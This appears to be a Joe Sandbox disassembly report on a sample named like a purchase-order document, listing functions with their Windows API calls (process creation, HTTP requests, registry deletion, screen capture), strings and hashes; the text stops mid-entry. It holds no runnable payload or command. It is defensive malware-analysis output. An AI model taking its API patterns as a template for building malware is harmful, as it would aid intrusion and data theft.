CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001CB3B6
GetLastError.KERNEL32(00000000), ref: 001CB407
CloseHandle.KERNEL32(?), ref: 001CB439
CloseHandle.KERNEL32(00000000), ref: 001CB44A
CloseHandle.KERNEL32(00000000), ref: 001CB45C
CloseHandle.KERNEL32(00000000), ref: 001CB46E
CloseHandle.KERNEL32(?), ref: 001CB4E3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 543c4c5c91ae350ce758f28f80b994e2ac596f482b5fde5ddbaea69c59528ad4
Instruction ID: c45250d5be4f05b8bb22d0bc195ca18d51145d7a9950b1d6026a047552e87b21
Opcode Fuzzy Hash: 543c4c5c91ae350ce758f28f80b994e2ac596f482b5fde5ddbaea69c59528ad4
Instruction Fuzzy Hash: 50F17B315083409FD714EF24C892B6EBBE5BFA5314F14895DF8999B2A2CB31EC45CB92

Function 0014326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00211990), ref: 00182F8D
GetMenuItemCount.USER32(00211990), ref: 0018303D
GetCursorPos.USER32(?), ref: 00183081
SetForegroundWindow.USER32(00000000), ref: 0018308A
TrackPopupMenuEx.USER32(00211990,00000000,?,00000000,00000000,00000000), ref: 0018309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001830A9

Strings

0, xrefs: 0014327D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 19fe32cbb218a5e7cd7739efecbaf07e79d973c1a65ef0e4978842710784cb66
Instruction ID: 9cc4581a028c204addc0e70f13d90bf1e6006de79551446c802528c9d4f46c2f
Opcode Fuzzy Hash: 19fe32cbb218a5e7cd7739efecbaf07e79d973c1a65ef0e4978842710784cb66
Instruction Fuzzy Hash: AB715D30645206BFEB259F64DC89F9ABF64FF05324F204206F624661E0C7B1AE50DF90

Function 001D6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 001D6DEB

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001D6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001D6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D6E94
DestroyWindow.USER32(?), ref: 001D6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00140000,00000000), ref: 001D6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D6EFD
GetDesktopWindow.USER32 ref: 001D6F16
GetWindowRect.USER32(00000000), ref: 001D6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001D6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001D6F4D

Part of subcall function 00159944: GetWindowLongW.USER32(?,000000EB), ref: 00159952

Strings

tooltips_class32, xrefs: 001D6E58, 001D6EDD
0, xrefs: 001D6D98

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 7cf86ff6afdcad93a310a1d14f5f9b4f64709c5c688d0721b6a211624fd3b317
Instruction ID: c4056e2e89083219cd6e0184e321d4d41d12258bba41c7a706dab22b85c6f4b1
Opcode Fuzzy Hash: 7cf86ff6afdcad93a310a1d14f5f9b4f64709c5c688d0721b6a211624fd3b317
Instruction Fuzzy Hash: 68716674104245AFDB21CF18DC58EAABBF9FB99304F04491EF99987361CB70E946CB52

Function 001BC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001BC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001BC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001BC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001BC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001BC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001BC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001BC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001BC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001BC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001BC5F0
InternetCloseHandle.WININET(00000000), ref: 001BC5FB

Strings

, xrefs: 001BC575

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: d351975b83d6fdc127ac14acda7ac9da6f8a4ec101694e6de40420fbf48e2cfe
Instruction ID: 0b19835dacb7654b6126d76cfa7bb287fb2686729b2a35ab70817f83faaf63fa
Opcode Fuzzy Hash: d351975b83d6fdc127ac14acda7ac9da6f8a4ec101694e6de40420fbf48e2cfe
Instruction Fuzzy Hash: 33513BB1601609BFDB219FA5C988AEB7BBCFF08754F00441AF945D6650DB34EA44DBE0

Function 001D856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 001D8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85BA
GlobalLock.KERNEL32(00000000), ref: 001D85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85D7
GlobalUnlock.KERNEL32(00000000), ref: 001D85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,001DFC38,?), ref: 001D8611
GlobalFree.KERNEL32(00000000), ref: 001D8621
GetObjectW.GDI32(?,00000018,?), ref: 001D8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001D8671
DeleteObject.GDI32(?), ref: 001D8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001D86AF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 080598317d0fcfb8a3202022fa3a954ea1405efb9724e3d3e4b25533c00f6317
Instruction ID: f09034faf4d2a7d03eeca9e609346f2c0cdb198d0126c658757514b192e55805
Opcode Fuzzy Hash: 080598317d0fcfb8a3202022fa3a954ea1405efb9724e3d3e4b25533c00f6317
Instruction Fuzzy Hash: 5B412875602209AFDB119FA5DC48EAE7BBCFF89B11F10855AF909E7260DB309941CB60

Function 001B14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 001B1502
VariantCopy.OLEAUT32(?,?), ref: 001B150B
VariantClear.OLEAUT32(?), ref: 001B1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001B15FB
VarR8FromDec.OLEAUT32(?,?), ref: 001B1657
VariantInit.OLEAUT32(?), ref: 001B1708
SysFreeString.OLEAUT32(?), ref: 001B178C
VariantClear.OLEAUT32(?), ref: 001B17D8
VariantClear.OLEAUT32(?), ref: 001B17E7
VariantInit.OLEAUT32(00000000), ref: 001B1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 001B1625
Default, xrefs: 001B16AF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: b7a230f9c21207b6779111b6f8f703238098c65d7f462746ebab8a3c14a603b6
Instruction ID: 68bca7cc80ced9700bdff747a8c219ee6b2508515bf7d0b4f679b34992a00d6c
Opcode Fuzzy Hash: b7a230f9c21207b6779111b6f8f703238098c65d7f462746ebab8a3c14a603b6
Instruction Fuzzy Hash: 62D13432A00115FBCB249F64E8A4BBDB7B5BF46700F92855AF807AB190DB30DC45DBA1

Function 001CB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CC9F1
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA68
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001CB772
RegDeleteValueW.ADVAPI32(?,?), ref: 001CB80A
RegCloseKey.ADVAPI32(?), ref: 001CB87E
RegCloseKey.ADVAPI32(?), ref: 001CB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 001CB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001CB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 001CB922
FreeLibrary.KERNEL32(00000000), ref: 001CB983
RegCloseKey.ADVAPI32(00000000), ref: 001CB994

Strings

RegDeleteKeyExW, xrefs: 001CB8FE
advapi32.dll, xrefs: 001CB8ED

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 944e0fdffabef4fd2f09033906e8ec9debaa29addb65418944ac755170e5630a
Instruction ID: 8fe7c3fbcfe01bb175dfa5f10e61d8d01453aec19142123bc0919ef08619ef2d
Opcode Fuzzy Hash: 944e0fdffabef4fd2f09033906e8ec9debaa29addb65418944ac755170e5630a
Instruction Fuzzy Hash: 4AC18B74209242AFD714DF24C4D6F2ABBE5BF94308F14855CF49A8B6A2CB35EC45CB92

Function 001C255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001C25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001C25E8
CreateCompatibleDC.GDI32(?), ref: 001C25F4
SelectObject.GDI32(00000000,?), ref: 001C2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001C266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001C26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001C26D0
SelectObject.GDI32(?,?), ref: 001C26D8
DeleteObject.GDI32(?), ref: 001C26E1
DeleteDC.GDI32(?), ref: 001C26E8
ReleaseDC.USER32(00000000,?), ref: 001C26F3

Strings

(, xrefs: 001C268D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f0c72bb9e836feebfc9b751834932eb8969d0e5cf1c0ec7fa58eb45e266ae40a
Instruction ID: f13369aef1000663faad6eb001887ca5169d2309c974f12f2472f2ca0242da36
Opcode Fuzzy Hash: f0c72bb9e836feebfc9b751834932eb8969d0e5cf1c0ec7fa58eb45e266ae40a
Instruction Fuzzy Hash: AE61F5B5D0121AEFCF04CFA4D885EAEBBB6FF58310F20851AE955A7250D770A941CFA0

Function 0017DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0017DAA1

Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D659
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D66B
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D67D
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D68F
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6A1
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6B3
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6C5
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6D7
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6E9
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6FB
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D70D
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D71F
Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D731

_free.LIBCMT ref: 0017DA96

Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0

_free.LIBCMT ref: 0017DAB8
_free.LIBCMT ref: 0017DACD
_free.LIBCMT ref: 0017DAD8
_free.LIBCMT ref: 0017DAFA
_free.LIBCMT ref: 0017DB0D
_free.LIBCMT ref: 0017DB1B
_free.LIBCMT ref: 0017DB26
_free.LIBCMT ref: 0017DB5E
_free.LIBCMT ref: 0017DB65
_free.LIBCMT ref: 0017DB82
_free.LIBCMT ref: 0017DB9A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 98f2aa1a43219c7336b0de4df0921821873494bf3b3b19de7ca5c6d449403593
Instruction ID: 7b9efbe9b04109fc280035a91de74810e8c9aba553ea0c598b984e48c38ca2a8
Opcode Fuzzy Hash: 98f2aa1a43219c7336b0de4df0921821873494bf3b3b19de7ca5c6d449403593
Instruction Fuzzy Hash: 9B3149316443099FEB22AA39E845B5AB7F9FF21314F19C829E54DD7192DF31AC818B20

Function 001A365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 001A369C
_wcslen.LIBCMT ref: 001A36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001A3797
GetClassNameW.USER32(?,?,00000400), ref: 001A380C
GetDlgCtrlID.USER32(?), ref: 001A385D
GetWindowRect.USER32(?,?), ref: 001A3882
GetParent.USER32(?), ref: 001A38A0
ScreenToClient.USER32(00000000), ref: 001A38A7
GetClassNameW.USER32(?,?,00000100), ref: 001A3921
GetWindowTextW.USER32(?,?,00000400), ref: 001A395D

Strings

%s%u, xrefs: 001A3734

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 632904540a9068aa8cb6cee4675c1eb77f269bf5f5bcc743b9d63613cf864f32
Instruction ID: e9b5639df3517ff68d589fe50cddbaa4ecdd23c3471967bf91d4ab22bd805e97
Opcode Fuzzy Hash: 632904540a9068aa8cb6cee4675c1eb77f269bf5f5bcc743b9d63613cf864f32
Instruction Fuzzy Hash: 1091E175204606AFDB08DF24C885BEBF7A8FF45354F008629F9A9C2190DB34EA56CBD1

Function 001A4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 001A4994
GetWindowTextW.USER32(?,?,00000400), ref: 001A49DA
_wcslen.LIBCMT ref: 001A49EB
CharUpperBuffW.USER32(?,00000000), ref: 001A49F7
_wcsstr.LIBVCRUNTIME ref: 001A4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 001A4A64
GetWindowTextW.USER32(?,?,00000400), ref: 001A4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 001A4AE6
GetClassNameW.USER32(?,?,00000400), ref: 001A4B20
GetWindowRect.USER32(?,?), ref: 001A4B8B

Strings

ThumbnailClass, xrefs: 001A4A6F, 001A4AF1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 7d6a1eef1f810d9ffba84a5a4239e829b49069a4cc6d9cc7d932691d3508cd6f
Instruction ID: 58322c7d11103d0711d77a880469cfcd63b3d6cfec0694e83462098b75d76033
Opcode Fuzzy Hash: 7d6a1eef1f810d9ffba84a5a4239e829b49069a4cc6d9cc7d932691d3508cd6f
Instruction Fuzzy Hash: DF91DF750052069FDB04CF14C981BABB7E8FFD6314F04846AFD8A9A196DBB0ED45CBA1

Function 001D8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001D8D5A
GetFocus.USER32 ref: 001D8D6A
GetDlgCtrlID.USER32(00000000), ref: 001D8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 001D8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001D8ECF
GetMenuItemCount.USER32(?), ref: 001D8EEC
GetMenuItemID.USER32(?,00000000), ref: 001D8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001D8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001D8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001D8FA1

Strings

0, xrefs: 001D8E9F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: a3eb02b1eac88bd208cb3523a3bbb43dad184f6098f44d085a9a39b50e7c68a1
Instruction ID: 23463da81f8931dc156315b0871799ccfa40e1521e78107108bcea3af31f9c0a
Opcode Fuzzy Hash: a3eb02b1eac88bd208cb3523a3bbb43dad184f6098f44d085a9a39b50e7c68a1
Instruction Fuzzy Hash: E381BF715093019FDB10CF28D884AABBBE9FB98714F040A1EF99497391DB30D941CFA1

Function 001ADC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 001ADC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001ADC46
_wcslen.LIBCMT ref: 001ADC50
_wcsstr.LIBVCRUNTIME ref: 001ADCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001ADCBC

Strings

StringFileInfo\, xrefs: 001ADC8F
\VarFileInfo\Translation, xrefs: 001ADCB4
04090000, xrefs: 001ADCF2
%u.%u.%u.%u, xrefs: 001ADD9A
DefaultLangCodepage, xrefs: 001ADD1F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 013890414dfa2fff69414e1048668836f9f7855596fc1b45a7665e76dd3744c1
Instruction ID: 715c0f0eaf5469a0c5d93daa8c392f970b41fee11b2aca620f927bae4fc82766
